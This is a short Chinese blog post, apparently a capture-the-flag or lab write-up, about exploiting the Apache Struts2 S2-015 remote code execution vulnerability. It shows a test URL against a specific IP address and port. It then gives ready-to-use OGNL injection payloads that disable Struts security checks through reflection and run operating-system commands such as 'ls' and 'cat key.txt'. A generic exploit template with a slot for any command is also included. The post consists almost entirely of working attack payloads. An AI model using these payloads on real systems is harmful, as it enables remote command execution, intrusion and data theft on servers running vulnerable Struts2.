【Struts2-命令-代码执行突破分析系列】S2-015

时间：2020-04-16 15:29:22 阅读：105 评论：0 收藏：0 [点我收藏+]

测试漏洞

http://219.153.49.228:45828/${1+2}.action

表达式进行了计算，表示漏洞存在，开始构造exp

读取当前文件夹的文件

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls‘).getInputStream()),#q}.action

读取key.txt

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat key.txt‘).getInputStream()),#q}.action

Exp代码：

${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘[命令]‘).getInputStream()),#q}.action

【Struts2-命令-代码执行突破分析系列】S2-015

原文：https://www.cnblogs.com/ssan/p/12712695.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)